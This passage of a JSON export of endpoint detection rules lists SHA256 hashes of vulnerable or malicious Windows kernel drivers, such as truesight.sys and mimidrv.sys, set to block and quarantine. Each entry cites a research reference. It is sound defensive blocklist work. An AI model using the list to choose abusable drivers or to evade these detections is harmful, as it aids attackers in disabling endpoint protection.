+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140400Z",
+ "creation_date": "2026-03-23T11:45:31.140402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "533efbc6f25ded2d796c0c96c8e1bc8b051117e1592b2e66eafe29faeb2b00b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0509759-837a-54d5-afdf-f48f3a85863f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612812Z",
+ "creation_date": "2026-03-23T11:45:29.612814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f056e731-5b05-58d5-90ca-2971569220f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454594Z",
+ "creation_date": "2026-03-23T11:45:30.454597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e2a75c0a5e5cb6c28432ff796d5bd6cb154139498c23b2076b5db06b453acb4",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0589276-ba84-5e14-9475-6d65cc5c0998",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615623Z",
+ "creation_date": "2026-03-23T11:45:29.615625Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615631Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1795ec9d05d0efe56e76bf4b76a09a804d3cd5b0e75bc47049d5ee488fc2bec",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f05e2246-9183-5025-9309-244870ac083b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483565Z",
+ "creation_date": "2026-03-23T11:45:31.483569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483579Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44c425bee3b0ec076e2d69aec8f1cba7a0a7e696b5956151f5d5e01daf9a276e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f06a3ce5-ea36-5f1e-bc81-4b17a44441cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480268Z",
+ "creation_date": "2026-03-23T11:45:30.480271Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33494ed37d4be23b7de493d5f2c9c31a83a7a834c79a5fd7c2a93c1054f583b1",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f07a2183-25e1-576d-aac8-6da429b664d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828225Z",
+ "creation_date": "2026-03-23T11:45:31.828229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828237Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a330bbf3d7e7df05ccc862ce00558226515259db9beefc461ca52b20bc550ac1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0842e48-acc8-5301-a18d-6b1d8a87a020",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620798Z",
+ "creation_date": "2026-03-23T11:45:29.620800Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9b3878ddc5dfb237d38f8d25067267870afd67d12a330397a8853209c4d889c", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f093affe-0ee2-551c-817c-7f4a71f115c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454124Z", + "creation_date": "2026-03-23T11:45:30.454128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7c79238f862b471740aff4cc3982658d1339795e9ec884a8921efe2e547d7c3", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f0994127-6151-5352-9f80-6b55f6c9248d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807370Z", + "creation_date": "2026-03-23T11:45:31.807372Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807378Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "504aa932b4c664e62f7958a8284040a3e4e89a8faf53b28ea6cd86d4ea3bc637", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f09c11f2-c992-5566-8d4a-2ed64efdbc3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819912Z", + "creation_date": "2026-03-23T11:45:30.819914Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819919Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "35ad05063e2b44b2e606464f12405b954ac8bc8417fa9732ba13365dbe26f90b", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f0a88f52-7fba-5427-9a57-9f90bdc090eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826685Z", + "creation_date": "2026-03-23T11:45:31.826687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826694Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d091fd19eadd1cbb97b279d50c022ecd1bf2178a24552086ecf43e1c26e3b8dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f0b4bc5b-8184-532a-b959-58983c714a70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832927Z", + "creation_date": "2026-03-23T11:45:30.832930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832938Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fbb1b9ec0952ce9e643da077c2b8a0ad892f94b749c5e1f6d521934c7b85fe37", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f0be8ae1-bc11-56e5-8f81-65a4f7925e2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818134Z", + "creation_date": "2026-03-23T11:45:31.818137Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818146Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cdf3023c31e1d6e135a213d0b6b5ec1042a76f9c3a0aaac5bf3ca44ae7e93dfe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f0c4e43a-0147-5621-91fc-85ee3f7fcfe5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480099Z", + "creation_date": "2026-03-23T11:45:30.480101Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480107Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59cbdc9190000b1de3719dbdb5d90459c602487672a3bae9c56d8ffae5e64250", + "comment": "Vulnerable Kernel Driver (aka stdcdrv64sys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f0d51228-26d4-5581-af10-29572aabef61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497596Z", + "creation_date": 
"2026-03-23T11:45:31.497599Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497604Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7310f23cc50de883174cdd6d2bb3ebeb5f82e9cfe8a600e430260574537a585", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f0d72f79-9ee9-5b63-8d78-30953b161ea7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465709Z", + "creation_date": "2026-03-23T11:45:30.465712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07759750fbb93c77b5c3957c642a9498fcff3946a5c69317db8d6be24098a4a0", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f0e66f8b-d6b0-5d17-a2fd-4d2d5e1c0643", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466865Z", + "creation_date": "2026-03-23T11:45:30.466881Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466891Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e1d32e156037b09105c3640d06e5b34fbe0bb49c605697d13b5fc26776fae26", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f10681fb-11c8-53d5-892d-3910a058261e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980603Z", + "creation_date": "2026-03-23T11:45:29.980605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980610Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39789a159c1196255f1b6d83e23af4082fd4cffe2662e40b71631b4e2e4bc05d", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f10b8f44-5a16-5d0a-873e-040078513b9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456982Z", + "creation_date": "2026-03-23T11:45:30.456985Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456995Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce12d9c2996a6626f6fc68415f8a94851b3468c9c62cc408dbdc0227cf77939d", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f10c51b7-b98a-5900-9a99-77ecc1bb544b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", 
+ "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494905Z", + "creation_date": "2026-03-23T11:45:31.494907Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494912Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9cd1e2a2f242719ea4f69364abc3d0732a119eea406e01c1cd53b3fb4222e66f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f1111198-594d-5e46-a6f3-548f2ed5e68d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815141Z", + "creation_date": "2026-03-23T11:45:31.815144Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815149Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa1c8e1f60b19fe70de7fa80763a193bc85aa4bb1803895a8a849992429633a8", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f1111e04-83be-532b-9b22-8ed433340468", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826786Z", + "creation_date": "2026-03-23T11:45:30.826790Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826799Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91ea0f447ba2d2ceee00054c3df287499cb62c73ff272907a7295199ec6a8964", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f11a38ca-434e-531b-9e7a-3001eb011fa1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
